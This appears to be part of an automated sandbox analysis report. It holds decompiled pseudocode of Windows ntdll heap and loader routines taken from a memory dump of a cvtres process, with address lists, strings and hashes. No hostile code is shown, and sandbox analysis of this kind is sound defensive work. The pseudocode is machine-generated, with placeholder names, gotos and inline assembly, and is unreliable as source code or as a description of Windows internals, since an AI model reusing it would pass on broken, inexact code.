								__eflags =  *((intOrPtr*)(_t241 + 0x10)) + _t279 - _t223[0x28];
								if( *((intOrPtr*)(_t241 + 0x10)) + _t279 != _t223[0x28]) {
									 *_v20 = _v12 + ( *_t292 & 0x0000ffff) * 8;
									L26:
									_t243 = 0;
									 *((char*)(_t292 + 3)) = 0;
									_t276 = _t223[0x18];
									if(_t223[0x18] != _t223) {
										_t160 = (_t292 - _t223 >> 0x10) + 1;
										_v24 = _t160;
										__eflags = _t160 - 0xfe;
										if(_t160 >= 0xfe) {
											_push(0);
											_push(0);
											E0566A80D(_t276, 3, _t292, _t223);
											_t160 = _v24;
										}
										_t243 = _t160;
									}
									 *((char*)(_t292 + 6)) = _t243;
									_t163 =  *( *[fs:0x30] + 0x50);
									if(_t163 != 0) {
										__eflags =  *_t163;
										if( *_t163 == 0) {
											goto L28;
										}
										_t227 = 0x7ffe0380;
										_t164 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
										goto L29;
									} else {
										L28:
										_t227 = 0x7ffe0380;
										_t164 = 0x7ffe0380;
										L29:
										if( *_t164 != 0) {
											_t165 =  *[fs:0x30];
											__eflags =  *(_t165 + 0x240) & 0x00000001;
											if(( *(_t165 + 0x240) & 0x00000001) != 0) {
												__eflags = E055C7D50();
												if(__eflags != 0) {
													_t227 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
													__eflags =  &(( *( *[fs:0x30] + 0x50))[0x89]);
												}
												_t276 = _t292;
												E05661582(_t227, _t291, _t292, __eflags,  *_v20,  *(_t291 + 0x74) << 3,  *_t227 & 0x000000ff);
											}
										}
										_t223 = 0x7ffe038a;
										_t167 =  *( *[fs:0x30] + 0x50);
										if(_t167 != 0) {
											__eflags =  *_t167;
											if( *_t167 == 0) {
												goto L31;
											}
											_t168 =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
											goto L32;
										} else {
											L31:
											_t168 = _t223;
											L32:
											if( *_t168 != 0) {
												__eflags = E055C7D50();
												if(__eflags != 0) {
													_t223 =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
													__eflags =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
												}
												_t276 = _t292;
												E05661582(_t223, _t291, _t292, __eflags,  *_v20,  *(_t291 + 0x74) << 3,  *_t223 & 0x000000ff);
											}
											_t131 = _t292;
											goto L34;
										}
									}
								}
								_t152 = _v20;
							}
							E055CB73D(_t291, _t223,  *((intOrPtr*)(_t241 + 0x10)) + _v12 + 0xffffffe8, _t279 - _v12, _t292, _t152);
							 *_v20 =  *_v20 << 3;
							goto L26;
						} else {
							_t283 =  *(_t291 + 0xb8);
							if(_t283 != 0) {
								_t190 =  *(_t238 + 0x14) >> 0xc;
								while(1) {
									__eflags = _t190 - _t283[1];
									if(_t190 < _t283[1]) {
										break;
									}
									_t252 =  *_t283;
									__eflags = _t252;
									_v24 = _t252;
									_t238 = _v16;
									if(_t252 == 0) {
										_t190 = _t283[1] - 1;
										__eflags = _t283[1] - 1;
										L70:
										E055CBC04(_t291, _t283, 0, _t238, _t190,  *(_t238 + 0x14));
										_t238 = _v16;
										goto L19;
									}
									_t283 = _v24;
								}
								goto L70;
							}
							L19:
							_t193 =  *_t238;
							_t284 =  *((intOrPtr*)(_t238 + 4));
							_t254 =  *((intOrPtr*)(_t193 + 4));
							_v24 = _t254;
							_t238 = _v16;
							if( *_t284 != _t254 ||  *_t284 != _t238) {
								_push(_t238);
								_push( *_t284);
								E0566A80D(0, 0xd, _t238, _v24);
								_t238 = _v16;
							} else {
								 *_t284 = _t193;
								 *((intOrPtr*)(_t193 + 4)) = _t284;
							}
							goto L22;
						}
					}
					L10:
					_t144 = 0x7ffe0380;
					goto L11;
				}
			}





















































                                                                        0x055cb486
                                                                        0x055cb48a
                                                                        0x055cb48e
                                                                        0x055cb491
                                                                        0x055cb493
                                                                        0x055cb49a
                                                                        0x055cb49c
                                                                        0x055cb4a2
                                                                        0x055cb4a7
                                                                        0x055cb6fc
                                                                        0x055cb6fc
                                                                        0x055cb6b3
                                                                        0x055cb6c3
                                                                        0x055cb6c3
                                                                        0x055cb4b4
                                                                        0x0561294f
                                                                        0x05612951
                                                                        0x05612957
                                                                        0x0561295d
                                                                        0x05612961
                                                                        0x05612980
                                                                        0x05612985
                                                                        0x05612963
                                                                        0x05612978
                                                                        0x0561297d
                                                                        0x0561298b
                                                                        0x05612990
                                                                        0x05612995
                                                                        0x0561299d
                                                                        0x056129a1
                                                                        0x056129a2
                                                                        0x056129a2
                                                                        0x056129a7
                                                                        0x056129a7
                                                                        0x05612951
                                                                        0x055cb4ba
                                                                        0x055cb4ba
                                                                        0x055cb4bd
                                                                        0x055cb4c2
                                                                        0x055cb6d4
                                                                        0x055cb4c8
                                                                        0x055cb4c8
                                                                        0x055cb4c8
                                                                        0x055cb4cd
                                                                        0x055cb4d0
                                                                        0x055cb4d9
                                                                        0x055cb4df
                                                                        0x055cb4e2
                                                                        0x056129b7
                                                                        0x056129bd
                                                                        0x00000000
                                                                        0x055cb4e8
                                                                        0x055cb4e8
                                                                        0x055cb4ef
                                                                        0x055cb4fa
                                                                        0x055cb703
                                                                        0x055cb709
                                                                        0x055cb70b
                                                                        0x055cb711
                                                                        0x055cb711
                                                                        0x055cb70b
                                                                        0x055cb503
                                                                        0x055cb50c
                                                                        0x055cb511
                                                                        0x055cb514
                                                                        0x055cb519
                                                                        0x056129c5
                                                                        0x056129c7
                                                                        0x056129cc
                                                                        0x056129cd
                                                                        0x056129cf
                                                                        0x056129d0
                                                                        0x056129d2
                                                                        0x056129d7
                                                                        0x056129d9
                                                                        0x056129ee
                                                                        0x056129ee
                                                                        0x056129f4
                                                                        0x056129fa
                                                                        0x05612a01
                                                                        0x00000000
                                                                        0x05612a01
                                                                        0x056129db
                                                                        0x056129df
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x056129e1
                                                                        0x056129e4
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x056129e6
                                                                        0x056129e6
                                                                        0x055cb51f
                                                                        0x055cb51f
                                                                        0x055cb520
                                                                        0x055cb525
                                                                        0x055cb52b
                                                                        0x055cb52d
                                                                        0x055cb52e
                                                                        0x055cb530
                                                                        0x055cb535
                                                                        0x055cb53b
                                                                        0x055cb53d
                                                                        0x05612a07
                                                                        0x00000000
                                                                        0x05612a07
                                                                        0x055cb549
                                                                        0x055cb54e
                                                                        0x05612a12
                                                                        0x05612a15
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05612a24
                                                                        0x055cb559
                                                                        0x055cb55c
                                                                        0x05612a34
                                                                        0x05612a3b
                                                                        0x05612a4d
                                                                        0x05612a4d
                                                                        0x05612a3b
                                                                        0x055cb566
                                                                        0x055cb56b
                                                                        0x055cb56f
                                                                        0x055cb57b
                                                                        0x055cb582
                                                                        0x05612a57
                                                                        0x05612a5c
                                                                        0x05612a5c
                                                                        0x055cb582
                                                                        0x055cb58b
                                                                        0x055cb58e
                                                                        0x055cb592
                                                                        0x055cb596
                                                                        0x055cb599
                                                                        0x055cb59b
                                                                        0x055cb59e
                                                                        0x055cb5a3
                                                                        0x055cb5a6
                                                                        0x055cb5a9
                                                                        0x05612a66
                                                                        0x05612a67
                                                                        0x05612a73
                                                                        0x05612a78
                                                                        0x055cb5b8
                                                                        0x055cb5b8
                                                                        0x055cb5bb
                                                                        0x055cb5bd
                                                                        0x055cb5bd
                                                                        0x055cb5c4
                                                                        0x055cb5f7
                                                                        0x055cb5f7
                                                                        0x055cb600
                                                                        0x055cb606
                                                                        0x055cb60c
                                                                        0x055cb612
                                                                        0x055cb618
                                                                        0x055cb621
                                                                        0x055cb623
                                                                        0x055cb629
                                                                        0x055cb629
                                                                        0x055cb62c
                                                                        0x055cb62f
                                                                        0x055cb633
                                                                        0x055cb636
                                                                        0x055cb639
                                                                        0x055cb71d
                                                                        0x055cb720
                                                                        0x055cb736
                                                                        0x055cb660
                                                                        0x055cb660
                                                                        0x055cb662
                                                                        0x055cb665
                                                                        0x055cb66a
                                                                        0x055cb6e6
                                                                        0x055cb6e7
                                                                        0x055cb6ea
                                                                        0x055cb6ef
                                                                        0x05612ad1
                                                                        0x05612ad2
                                                                        0x05612ad8
                                                                        0x05612add
                                                                        0x05612add
                                                                        0x055cb6f5
                                                                        0x055cb6f5
                                                                        0x055cb672
                                                                        0x055cb675
                                                                        0x055cb67a
                                                                        0x05612ae5
                                                                        0x05612ae8
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05612af4
                                                                        0x05612afc
                                                                        0x00000000
                                                                        0x055cb680
                                                                        0x055cb680
                                                                        0x055cb680
                                                                        0x055cb685
                                                                        0x055cb687
                                                                        0x055cb68a
                                                                        0x05612b06
                                                                        0x05612b0c
                                                                        0x05612b13
                                                                        0x05612b1e
                                                                        0x05612b20
                                                                        0x05612b2b
                                                                        0x05612b2b
                                                                        0x05612b2b
                                                                        0x05612b34
                                                                        0x05612b45
                                                                        0x05612b45
                                                                        0x05612b13
                                                                        0x055cb696
                                                                        0x055cb69b
                                                                        0x055cb6a0
                                                                        0x05612b4f
                                                                        0x05612b52
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05612b61
                                                                        0x00000000
                                                                        0x055cb6a6
                                                                        0x055cb6a6
                                                                        0x055cb6a6
                                                                        0x055cb6a8
                                                                        0x055cb6ab
                                                                        0x05612b70
                                                                        0x05612b72
                                                                        0x05612b7d
                                                                        0x05612b7d
                                                                        0x05612b7d
                                                                        0x05612b86
                                                                        0x05612b97
                                                                        0x05612b97
                                                                        0x055cb6b1
                                                                        0x00000000
                                                                        0x055cb6b1
                                                                        0x055cb6a0
                                                                        0x055cb67a
                                                                        0x055cb722
                                                                        0x055cb722
                                                                        0x055cb655
                                                                        0x055cb65d
                                                                        0x00000000
                                                                        0x055cb5c6
                                                                        0x055cb5c6
                                                                        0x055cb5ce
                                                                        0x05612a83
                                                                        0x05612a97
                                                                        0x05612a97
                                                                        0x05612a9a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05612a88
                                                                        0x05612a8a
                                                                        0x05612a8c
                                                                        0x05612a8f
                                                                        0x05612a92
                                                                        0x05612aa1
                                                                        0x05612aa1
                                                                        0x05612aa2
                                                                        0x05612aab
                                                                        0x05612ab0
                                                                        0x00000000
                                                                        0x05612ab0
                                                                        0x05612a94
                                                                        0x05612a94
                                                                        0x00000000
                                                                        0x05612a9c
                                                                        0x055cb5d4
                                                                        0x055cb5d4
                                                                        0x055cb5d6
                                                                        0x055cb5d9
                                                                        0x055cb5de
                                                                        0x055cb5e1
                                                                        0x055cb5e4
                                                                        0x05612ab8
                                                                        0x05612ab9
                                                                        0x05612ac4
                                                                        0x05612ac9
                                                                        0x055cb5f2
                                                                        0x055cb5f2
                                                                        0x055cb5f4
                                                                        0x055cb5f4
                                                                        0x00000000
                                                                        0x055cb5e4
                                                                        0x055cb5c4
                                                                        0x055cb554
                                                                        0x055cb554
                                                                        0x00000000
                                                                        0x055cb554

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                        • API String ID: 0-4253913091
                                                                        • Opcode ID: 6343bd36433416c3138bdd29680102bcdaef5ec74ab7e29ccb3c7624baac5bc3
                                                                        • Instruction ID: d659276a9d8e3c79cbd665a47882d44f2fcc01cf492a53c509a11635fba80097
                                                                        • Opcode Fuzzy Hash: 6343bd36433416c3138bdd29680102bcdaef5ec74ab7e29ccb3c7624baac5bc3
                                                                        • Instruction Fuzzy Hash: D0E1AC74B00205DFDB18CFA9C895B7ABBB6FB44314F1445ADE8029B791D730E981CB94
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055B8794 Relevance: 4.0, Strings: 3, Instructions: 255COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 83%
                                                                        			E055B8794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E055B934A() != 0) {
								_t159 = E0562A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x5695780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E05625510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x5695780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E055B849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E055B8999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E055B8999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x5695c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x5695c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E055C2280(_t92, 0x56986cc);
															_t94 = E05679DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E055D61A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x5695c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E055B8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x5695c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x5695c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E055EF380(_t136, 0x5581184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E055C2280(_t108, 0x56986cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E055D61A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E05679D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E055BFFB0(_t118, _t156, 0x56986cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E055E9A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}












































                                                                        0x055b8799
                                                                        0x055b879d
                                                                        0x055b87a1
                                                                        0x055b87a3
                                                                        0x055b87a8
                                                                        0x055b87c3
                                                                        0x055b87c3
                                                                        0x055b87c8
                                                                        0x055b87d1
                                                                        0x055b87d4
                                                                        0x055b87d8
                                                                        0x055b87e5
                                                                        0x055b87ec
                                                                        0x05609bfe
                                                                        0x05609c00
                                                                        0x05609c02
                                                                        0x05609c08
                                                                        0x05609c0d
                                                                        0x05609c0f
                                                                        0x05609c14
                                                                        0x05609c2d
                                                                        0x05609c32
                                                                        0x05609c37
                                                                        0x05609c3a
                                                                        0x05609c3c
                                                                        0x05609c42
                                                                        0x05609c42
                                                                        0x05609c3c
                                                                        0x05609c02
                                                                        0x055b87da
                                                                        0x055b87df
                                                                        0x055b87e3
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055b87e3
                                                                        0x055b87f2
                                                                        0x00000000
                                                                        0x055b87fb
                                                                        0x055b87fd
                                                                        0x055b87fe
                                                                        0x055b880e
                                                                        0x055b880f
                                                                        0x055b8810
                                                                        0x055b8814
                                                                        0x055b881a
                                                                        0x055b881c
                                                                        0x055b881f
                                                                        0x055b8821
                                                                        0x055b8822
                                                                        0x055b8824
                                                                        0x055b8826
                                                                        0x055b882c
                                                                        0x055b882e
                                                                        0x05609c48
                                                                        0x05609c48
                                                                        0x055b8834
                                                                        0x055b8834
                                                                        0x055b8837
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055b8837
                                                                        0x055b882e
                                                                        0x055b883d
                                                                        0x055b8840
                                                                        0x055b8843
                                                                        0x055b8846
                                                                        0x055b8849
                                                                        0x055b884c
                                                                        0x055b884e
                                                                        0x055b8850
                                                                        0x055b8852
                                                                        0x055b8854
                                                                        0x055b8857
                                                                        0x055b88b4
                                                                        0x055b88b6
                                                                        0x055b88b6
                                                                        0x055b8859
                                                                        0x055b8859
                                                                        0x055b8859
                                                                        0x055b8861
                                                                        0x055b8866
                                                                        0x055b886a
                                                                        0x055b893d
                                                                        0x055b8941
                                                                        0x00000000
                                                                        0x055b8947
                                                                        0x055b8947
                                                                        0x055b894a
                                                                        0x055b894c
                                                                        0x00000000
                                                                        0x055b8952
                                                                        0x055b8955
                                                                        0x055b895a
                                                                        0x055b895d
                                                                        0x055b895d
                                                                        0x055b895f
                                                                        0x055b8961
                                                                        0x055b8961
                                                                        0x055b8968
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055b896a
                                                                        0x055b896b
                                                                        0x055b896e
                                                                        0x00000000
                                                                        0x055b8970
                                                                        0x055b8970
                                                                        0x055b8970
                                                                        0x055b8970
                                                                        0x055b8972
                                                                        0x055b8972
                                                                        0x055b8974
                                                                        0x00000000
                                                                        0x055b897a
                                                                        0x055b897a
                                                                        0x055b897d
                                                                        0x00000000
                                                                        0x055b8983
                                                                        0x05609c65
                                                                        0x05609c6d
                                                                        0x05609c72
                                                                        0x05609c75
                                                                        0x05609c75
                                                                        0x05609c82
                                                                        0x05609c86
                                                                        0x05609c87
                                                                        0x05609c88
                                                                        0x05609c89
                                                                        0x05609c8c
                                                                        0x05609c90
                                                                        0x05609c95
                                                                        0x05609c97
                                                                        0x05609ca0
                                                                        0x05609ca3
                                                                        0x05609ca9
                                                                        0x05609ca9
                                                                        0x00000000
                                                                        0x05609ca9
                                                                        0x05609ca3
                                                                        0x00000000
                                                                        0x05609c97
                                                                        0x055b897d
                                                                        0x00000000
                                                                        0x055b8974
                                                                        0x055b8988
                                                                        0x055b8992
                                                                        0x055b8996
                                                                        0x00000000
                                                                        0x055b8996
                                                                        0x055b894c
                                                                        0x00000000
                                                                        0x055b8870
                                                                        0x055b887b
                                                                        0x055b887d
                                                                        0x055b887f
                                                                        0x055b8881
                                                                        0x055b8884
                                                                        0x055b8884
                                                                        0x055b8886
                                                                        0x055b8889
                                                                        0x055b888c
                                                                        0x055b888e
                                                                        0x055b8891
                                                                        0x055b8891
                                                                        0x055b8898
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055b889a
                                                                        0x055b889b
                                                                        0x055b889e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055b88a0
                                                                        0x055b88a8
                                                                        0x055b88b0
                                                                        0x055b88b2
                                                                        0x055b88d3
                                                                        0x055b88d5
                                                                        0x00000000
                                                                        0x055b88d7
                                                                        0x055b88db
                                                                        0x055b88dc
                                                                        0x055b88e0
                                                                        0x055b88e8
                                                                        0x055b88ee
                                                                        0x055b88f0
                                                                        0x055b88f3
                                                                        0x055b88fc
                                                                        0x055b8901
                                                                        0x055b8906
                                                                        0x055b890c
                                                                        0x055b890c
                                                                        0x055b890f
                                                                        0x055b8916
                                                                        0x055b8917
                                                                        0x055b8918
                                                                        0x055b8919
                                                                        0x055b891a
                                                                        0x055b891f
                                                                        0x055b8921
                                                                        0x05609c52
                                                                        0x05609c55
                                                                        0x05609c5b
                                                                        0x05609cac
                                                                        0x05609cc0
                                                                        0x05609cc0
                                                                        0x05609c55
                                                                        0x055b8927
                                                                        0x055b8927
                                                                        0x055b892f
                                                                        0x055b8933
                                                                        0x00000000
                                                                        0x055b88f5
                                                                        0x055b88f5
                                                                        0x00000000
                                                                        0x055b88f7
                                                                        0x055b88f7
                                                                        0x055b88fa
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055b88fa
                                                                        0x055b88f5
                                                                        0x055b88f3
                                                                        0x00000000
                                                                        0x055b88d5
                                                                        0x00000000
                                                                        0x055b88b2
                                                                        0x055b88c9
                                                                        0x00000000
                                                                        0x055b88c9
                                                                        0x055b887f
                                                                        0x055b886a
                                                                        0x055b8857
                                                                        0x055b8852
                                                                        0x055b88bf
                                                                        0x055b88bf
                                                                        0x055b87aa
                                                                        0x055b87ad
                                                                        0x055b87ae
                                                                        0x055b87b4
                                                                        0x055b87b5
                                                                        0x055b87b6
                                                                        0x055b87b8
                                                                        0x055b87bd
                                                                        0x055b87c1
                                                                        0x055b87f4
                                                                        0x055b87fa
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055b87c1
                                                                        0x00000000

                                                                        Strings
                                                                        • LdrpDoPostSnapWork, xrefs: 05609C1E
                                                                        • minkernel\ntdll\ldrsnap.c, xrefs: 05609C28
                                                                        • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 05609C18
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                                        • API String ID: 2994545307-1948996284
                                                                        • Opcode ID: 02625187231be13e89a5a0269e2a67152cf042fb0256f8d2310613a55299d848
                                                                        • Instruction ID: 776d4ea58bbec6513d6cc7436636d8b5ed4a5ea84a277e51d512eea25a96f6fd
                                                                        • Opcode Fuzzy Hash: 02625187231be13e89a5a0269e2a67152cf042fb0256f8d2310613a55299d848
                                                                        • Instruction Fuzzy Hash: A291F671E00616DFEF18DF58C4899FAB7BAFF44314F045469E906AB241DBB1E902CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055DAC7B Relevance: 4.0, Strings: 3, Instructions: 205COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 80%
                                                                        			E055DAC7B(void* __ecx, signed short* __edx) {
				signed int _v8;
				signed int _v12;
				void* __ebx;
				signed char _t75;
				signed int _t79;
				signed int _t88;
				intOrPtr _t89;
				signed int _t96;
				signed char* _t97;
				intOrPtr _t98;
				signed int _t101;
				signed char* _t102;
				intOrPtr _t103;
				signed int _t105;
				signed char* _t106;
				signed int _t131;
				signed int _t138;
				void* _t149;
				signed short* _t150;

				_t150 = __edx;
				_t149 = __ecx;
				_t70 =  *__edx & 0x0000ffff;
				__edx[1] = __edx[1] & 0x000000f8;
				__edx[3] = 0;
				_v8 =  *__edx & 0x0000ffff;
				if(( *(__ecx + 0x40) & 0x00000040) != 0) {
					_t39 =  &(_t150[8]); // 0x8
					E055FD5E0(_t39, _t70 * 8 - 0x10, 0xfeeefeee);
					__edx[1] = __edx[1] | 0x00000004;
				}
				_t75 =  *(_t149 + 0xcc) ^  *0x5698a68;
				if(_t75 != 0) {
					L4:
					if( *((intOrPtr*)(_t149 + 0x4c)) != 0) {
						_t150[1] = _t150[0] ^ _t150[1] ^  *_t150;
						_t79 =  *(_t149 + 0x50);
						 *_t150 =  *_t150 ^ _t79;
						return _t79;
					}
					return _t75;
				} else {
					_t9 =  &(_t150[0x80f]); // 0x1017
					_t138 = _t9 & 0xfffff000;
					_t10 =  &(_t150[0x14]); // 0x20
					_v12 = _t138;
					if(_t138 == _t10) {
						_t138 = _t138 + 0x1000;
						_v12 = _t138;
					}
					_t75 = _t150 + (( *_t150 & 0x0000ffff) + 0xfffffffe) * 0x00000008 & 0xfffff000;
					if(_t75 > _t138) {
						_v8 = _t75 - _t138;
						_push(0x4000);
						_push( &_v8);
						_push( &_v12);
						_push(0xffffffff);
						_t131 = E055E96E0();
						__eflags = _t131 - 0xc0000045;
						if(_t131 == 0xc0000045) {
							_t88 = E05653C60(_v12, _v8);
							__eflags = _t88;
							if(_t88 != 0) {
								_push(0x4000);
								_push( &_v8);
								_push( &_v12);
								_push(0xffffffff);
								_t131 = E055E96E0();
							}
						}
						_t89 =  *[fs:0x30];
						__eflags = _t131;
						if(_t131 < 0) {
							__eflags =  *(_t89 + 0xc);
							if( *(_t89 + 0xc) == 0) {
								_push("HEAP: ");
								E055AB150();
							} else {
								E055AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_v8);
							_push(_v12);
							_push(_t149);
